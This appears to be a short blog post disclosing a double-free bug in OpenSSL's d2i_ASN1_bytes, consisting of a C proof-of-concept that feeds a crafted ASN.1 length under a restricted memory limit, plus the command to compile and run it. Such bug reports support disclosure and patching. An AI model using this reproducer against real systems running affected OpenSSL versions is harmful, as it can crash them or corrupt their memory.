OpenSSL: double-free after memory allocation in d2i_ASN1_bytes fails

#include <openssl/asn1.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    ASN1_STRING* a = ASN1_STRING_new();
    ASN1_STRING* b;
    unsigned char* pp;

    ASN1_STRING_set(a, "aa", -1);
    pp = malloc(0x80000000);
    if ( !pp )
    {
        printf("Allocation failure\n");
        return 0;
    }
    pp[0] = 0x01;
    pp[1] = 0x84;
    pp[2] = 0x7F;
    pp[3] = 0xFF;
    pp[4] = 0xFF;
    pp[5] = 0xFA;
    b = d2i_ASN1_bytes(&a, (const unsigned char**)&pp, 0x80000000, 1, 0);
    ASN1_STRING_free(a);

    return 0;
}
gcc d2i_ASN1_bytes_double_free.c -lcrypto; ulimit -v 4194304; ./a.out
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s